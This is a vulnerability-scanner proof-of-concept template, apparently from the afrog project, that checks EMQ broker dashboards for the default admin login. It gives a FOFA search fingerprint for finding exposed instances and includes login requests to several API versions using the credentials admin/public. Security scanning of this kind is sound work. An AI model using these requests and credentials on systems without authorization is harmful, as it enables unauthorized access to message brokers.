EMQ-default-password: EMQ Default Password

漏洞描述

EMQ default admin credentials were discovered. fofa: icon_hash="-670975485"

PoC代码[已公开]

id: EMQ-default-password

info:
  name: EMQ Default Password
  author: li1u.
  severity: high
  verified: true
  description: |-
    EMQ default admin credentials were discovered.
    fofa: icon_hash="-670975485"
  tags: emq,default-login
  created: 2024/02/28

rules:
  r3:
    request:
      method: GET
      path: /
    expression: response.body.ibcontains(b'<title>Dashboard</title>')
    stop_if_mismatch: true
  r0:
    request:
      method: POST
      path: /api/v4/auth
      Content-Type: application/json
      body: '{"username":"admin","password":"public"}'
    expression: response.content_type.contains("application/json") && response.body.bcontains(b'"code":0')
    stop_if_match: true
  r1:
    request:
      method: POST
      path: /api/v3/auth
      Content-Type: application/json
      body: '{"username":"admin","password":"public"}'
    expression: response.content_type.contains("application/json") && response.body.bcontains(b'"code":0')
    stop_if_match: true
  r2:
    request:
      method: POST
      path: /api/v2/auth
      Content-Type: application/json
      body: '{"username":"admin","password":"public"}'
    expression: response.content_type.contains("application/json") && response.body.bcontains(b'"code":0') && response.body.bcontains(b'"result":[]')
    stop_if_match: true
expression: r3() && (r0() || r1() || r2())

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/emq-default-password.yaml